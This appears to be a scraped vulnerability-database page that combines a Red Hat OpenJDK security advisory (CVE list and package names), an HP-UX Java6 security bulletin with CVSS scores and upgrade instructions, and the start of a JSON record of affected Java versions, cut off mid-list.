Apache Santuario, rework class loader (Libraries, 6741606, 8008744) 975131 - CVE-2013-2444 OpenJDK: Resource denial of service (AWT, 8001038) 975132 - CVE-2013-2446 OpenJDK: output stream access restrictions (CORBA, 8000642) 975133 - CVE-2013-2457 OpenJDK: Proper class checking (JMX, 8008120) 975134 - CVE-2013-2453 OpenJDK: MBeanServer Introspector package access (JMX, 8008124) 975137 - CVE-2013-2443 OpenJDK: AccessControlContext check order issue (Libraries, 8001330) 975138 - CVE-2013-2452 OpenJDK: Unique VMIDs (Libraries, 8001033) 975139 - CVE-2013-2455 OpenJDK: getEnclosing* checks (Libraries, 8007812) 975140 - CVE-2013-2447 OpenJDK: Prevent revealing the local address (Networking, 8001318) 975141 - CVE-2013-2450 OpenJDK: ObjectStreamClass circular reference denial of service (Serialization, 8000638) 975142 - CVE-2013-2456 OpenJDK: ObjectOutputStream access checks (Serialization, 8008132) 975144 - CVE-2013-2412 OpenJDK: JConsole SSL support (Serviceability, 8003703) 975148 - CVE-2013-1500 OpenJDK: Insecure shared memory permissions (2D, 8001034)
- Package List:
Red Hat Enterprise Linux Desktop (v. 5 client):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.41.1.11.11.90.el5_9.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-1.41.1.11.11.90.el5_9.i386.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.41.1.11.11.90.el5_9.i386.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.41.1.11.11.90.el5_9.i386.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.41.1.11.11.90.el5_9.i386.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.41.1.11.11.90.el5_9.i386.rpm java-1.6.0-openjdk-src-1.6.0.0-1.41.1.11.11.90.el5_9.i386.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-1.41.1.11.11.90.el5_9.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.41.1.11.11.90.el5_9.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.41.1.11.11.90.el5_9.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.41.1.11.11.90.el5_9.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.41.1.11.11.90.el5_9.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-1.41.1.11.11.90.el5_9.x86_64.rpm
Red Hat Enterprise Linux (v. 5 server):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.41.1.11.11.90.el5_9.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-1.41.1.11.11.90.el5_9.i386.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.41.1.11.11.90.el5_9.i386.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.41.1.11.11.90.el5_9.i386.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.41.1.11.11.90.el5_9.i386.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.41.1.11.11.90.el5_9.i386.rpm java-1.6.0-openjdk-src-1.6.0.0-1.41.1.11.11.90.el5_9.i386.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-1.41.1.11.11.90.el5_9.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.41.1.11.11.90.el5_9.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.41.1.11.11.90.el5_9.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.41.1.11.11.90.el5_9.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.41.1.11.11.90.el5_9.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-1.41.1.11.11.90.el5_9.x86_64.rpm
Red Hat Enterprise Linux Desktop (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.src.rpm
i386: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm java-1.6.0-openjdk-src-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.src.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.src.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.src.rpm
i386: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm java-1.6.0-openjdk-src-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.src.rpm
i386: java-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm
x86_64: java-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.62.1.11.11.90.el6_4.src.rpm
i386: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm java-1.6.0-openjdk-src-1.6.0.0-1.62.1.11.11.90.el6_4.i686.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-1.62.1.11.11.90.el6_4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2013-1500.html https://www.redhat.com/security/data/cve/CVE-2013-1571.html https://www.redhat.com/security/data/cve/CVE-2013-2407.html https://www.redhat.com/security/data/cve/CVE-2013-2412.html https://www.redhat.com/security/data/cve/CVE-2013-2443.html https://www.redhat.com/security/data/cve/CVE-2013-2444.html https://www.redhat.com/security/data/cve/CVE-2013-2445.html https://www.redhat.com/security/data/cve/CVE-2013-2446.html https://www.redhat.com/security/data/cve/CVE-2013-2447.html https://www.redhat.com/security/data/cve/CVE-2013-2448.html https://www.redhat.com/security/data/cve/CVE-2013-2450.html https://www.redhat.com/security/data/cve/CVE-2013-2452.html https://www.redhat.com/security/data/cve/CVE-2013-2453.html https://www.redhat.com/security/data/cve/CVE-2013-2455.html https://www.redhat.com/security/data/cve/CVE-2013-2456.html https://www.redhat.com/security/data/cve/CVE-2013-2457.html https://www.redhat.com/security/data/cve/CVE-2013-2459.html https://www.redhat.com/security/data/cve/CVE-2013-2461.html https://www.redhat.com/security/data/cve/CVE-2013-2463.html https://www.redhat.com/security/data/cve/CVE-2013-2465.html https://www.redhat.com/security/data/cve/CVE-2013-2469.html https://www.redhat.com/security/data/cve/CVE-2013-2470.html https://www.redhat.com/security/data/cve/CVE-2013-2471.html https://www.redhat.com/security/data/cve/CVE-2013-2472.html https://www.redhat.com/security/data/cve/CVE-2013-2473.html https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFR1FwzXlSAg2UNWIIRAr2aAJ9j03lh/R8goDWLLqCz9VdH4bM1jACgkYVl x3jKc8cs/WwK8V5nIG2hJ0Q= =LPQe -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03874547
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03874547 Version: 1
HPSBUX02908 rev.1 - HP-UX Running Java6, Remote Unauthorized Access, Disclosure of Information, and Other Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2013-07-31 Last Updated: 2013-07-31
Potential Security Impact: Remote unauthorized access, disclosure of information, and other vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified in the Java Runtime Environment (JRE) and the Java Developer Kit (JDK) running on HP-UX. HP-UX B.11.11, B.11.23, and B.11.31 running HP JDK and JRE v6.0.19 and earlier.
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2013-1500 (AV:L/AC:L/Au:N/C:P/I:P/A:N) 3.6 CVE-2013-1571 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2013-2407 (AV:N/AC:L/Au:N/C:P/I:N/A:P) 6.4 CVE-2013-2412 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2433 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2013-2437 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2442 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2013-2444 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2013-2445 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8 CVE-2013-2446 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2447 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2448 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2013-2450 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2013-2451 (AV:L/AC:H/Au:N/C:P/I:P/A:P) 3.7 CVE-2013-2452 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2453 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2013-2454 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8 CVE-2013-2455 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2456 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2457 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2013-2459 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2461 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2013-2463 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2464 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2465 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2466 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2468 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2469 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2470 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2471 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2472 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2473 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-3743 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following Java version upgrade to resolve these vulnerabilities.
The upgrade is available from the following location
http://www.hp.com/java
OS Version Release Version
HP-UX B.11.11, B.11.23, B.11.31 JDK and JRE v6.0.20 or subsequent
MANUAL ACTIONS: Yes - Update For Java v6.0 update to Java v6.0.20 or subsequent PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11 HP-UX B.11.23 =========== Jdk60.JDK60-COM Jdk60.JDK60-PA20 Jdk60.JDK60-PA20W Jre60.JRE60-COM Jre60.JRE60-COM-DOC Jre60.JRE60-PA20 Jre60.JRE60-PA20-HS Jre60.JRE60-PA20W Jre60.JRE60-PA20W-HS Jdk60.JDK60-IPF32 Jdk60.JDK60-IPF64 Jre60.JRE60-COM Jre60.JRE60-IPF32 Jre60.JRE60-IPF32-HS Jre60.JRE60-IPF64 Jre60.JRE60-IPF64-HS action: install revision 1.6.0.20.00 or subsequent
HP-UX B.11.23 HP-UX B.11.31 =========== Jdk60.JDK60-COM Jdk60.JDK60-IPF32 Jdk60.JDK60-IPF64 Jre60.JRE60-IPF32 Jre60.JRE60-IPF32-HS Jre60.JRE60-IPF64 Jre60.JRE60-IPF64-HS Jre60.JRE60-COM Jre60.JRE60-IPF32 Jre60.JRE60-IPF32-HS Jre60.JRE60-IPF64 Jre60.JRE60-IPF64-HS action: install revision 1.6.0.20.00 or subsequent
END AFFECTED VERSIONS
HISTORY Version:1 (rev.1) - 31 July 2013 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2013 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201306-0238", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "jrockit", "scope": "gte", "trust": 1.0, "vendor": "oracle", "version": "r27.7.1" }, { "model": "jrockit", "scope": "gte", "trust": 1.0, "vendor": "oracle", "version": "r28.0.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "jrockit", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "r27.7.5" }, { "model": "jrockit", "scope": "lte", "trust": 1.0, "vendor": "oracle", "version": "r28.2.7" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "sun", "version": "1.6.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "openjdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "jre 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 12", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.7" }, { "model": "jre 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 01", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 11", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 17", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 13", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 43", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 21", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 13", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 12", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 43", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 37", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.7" }, { "model": "jdk 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 25", "scope": null, "trust": 0.9, "vendor": 